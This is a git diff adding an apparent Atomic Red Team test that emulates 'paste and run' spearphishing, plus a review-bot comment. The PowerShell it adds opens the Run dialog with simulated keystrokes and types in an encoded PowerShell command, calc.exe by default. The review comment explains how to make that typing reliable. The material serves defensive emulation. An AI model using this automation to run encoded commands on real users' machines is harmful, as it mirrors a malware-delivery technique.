diff --git a/atomics/T1566.002/T1566.002.yaml b/atomics/T1566.002/T1566.002.yaml
new file mode 100644
index 00000000..e63cf5a3
--- /dev/null
+++ b/atomics/T1566.002/T1566.002.yaml
@@ -0,0 +1,47 @@
+attack_technique: T1566.002
+display_name: 'Phishing: Spearphishing Link'
+
+atomic_tests:
+- name: Paste and run technique
+ auto_generated_guid:
+ description: |
+ Tests the **Paste and Run** technique, where users are tricked into running
+ malicious PowerShell commands by automating the Win+R command to open the
+ Run dialog and input `encoded PowerShell to execute calc.exe.`
+
+ - [Fake CAPTCHA Campaign](https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf)
+ - [From Clipboard to Compromise](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn)
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ execution_command:
+ description: The command to execute in the run
+ type: String
+ default: 'calc.exe'
+ executor:
+ name: powershell
+ command: |
+ # Add user32.dll for keybd_event
+ Add-Type @"
+ using System;
+ using System.Runtime.InteropServices;
+ public class K {
+ [DllImport("user32.dll")]
+ public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo);
+ }
+ "@
+
+ # Virtual key codes
+ $VK_LWIN, $VK_R, $KEYDOWN, $KEYUP = 0x5B, 0x52, 0x0000, 0x0002
+
+ # Open Run dialog (Win+R)
+ [K]::keybd_event($VK_LWIN, 0, $KEYDOWN, [UIntPtr]::Zero)
+ [K]::keybd_event($VK_R, 0, $KEYDOWN, [UIntPtr]::Zero)
+ [K]::keybd_event($VK_R, 0, $KEYUP, [UIntPtr]::Zero)
+ [K]::keybd_event($VK_LWIN, 0, $KEYUP, [UIntPtr]::Zero)
+
+ # Short delay for Run dialog
+ Start-Sleep -Milliseconds 500
+ Add-Type -AssemblyName System.Windows.Forms
+ [System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")
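Review bot: The final `SendWait` line of the hunk passes the Base64 payload straight to SendKeys, which treats `+` (as well as `^`, `%`, `~`, `(`, `)`, `{`, `}`) as a modifier/metacharacter, so any `execution_command` whose UTF-16LE Base64 contains `+` is typed as Shift applied to the next character and the `-ec` payload is corrupted; the default `calc.exe` encodes to `YwBhAGwAYwAuAGUAeABlAA==` and happens to avoid this, which is why the test still appears to work as written. Escape it before sending, e.g. `$b64 = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')).Replace('+', '{+}')` followed by `[System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec ${b64}{ENTER}")`. A second concern is that nothing confirms the Run dialog actually took focus after the 500 ms `Start-Sleep`; if it did not (non-interactive session, slow desktop), the whole command plus `{ENTER}` is typed into whatever window is in the foreground. A guard such as `if (-not (New-Object -ComObject WScript.Shell).AppActivate('Run')) { throw 'Run dialog not focused; aborting' }` placed before the SendWait call avoids that. Note also that `execution_command` is spliced into a single-quoted PowerShell literal, so a value containing `'` will break the script; that constraint belongs in the argument's `description`.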